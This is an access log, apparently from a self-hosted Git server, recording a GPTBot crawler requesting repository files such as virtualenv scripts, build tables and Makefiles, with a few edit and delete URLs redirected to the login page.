GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12174] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:17:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19903] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12171] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:17:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19910] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13535] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:02:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:02:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:02:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11762] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" -[17/Feb/2026:17:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:17:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fPYZ-00.toc" [Client 74.7.227.38] [Length 20982] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:17:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fPKG-00.toc" [Client 74.7.227.38] [Length 35821] [Gzip 12.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:17:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fPKG-00.toc" [Client 74.7.227.38] [Length 35921] [Gzip 12.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:17:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fPYZ-00.toc" [Client 74.7.227.38] [Length 20983] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:17:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fEXE-00.toc" [Client 74.7.227.38] [Length 37310] [Gzip 12.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:17:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fEXE-00.toc" [Client 74.7.227.38] [Length 37223] [Gzip 12.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:17:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19899] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11035] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" -[17/Feb/2026:17:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" -[17/Feb/2026:17:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:17:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14319] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14312] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14313] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14313] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:17:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:17:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14312] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14313] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr 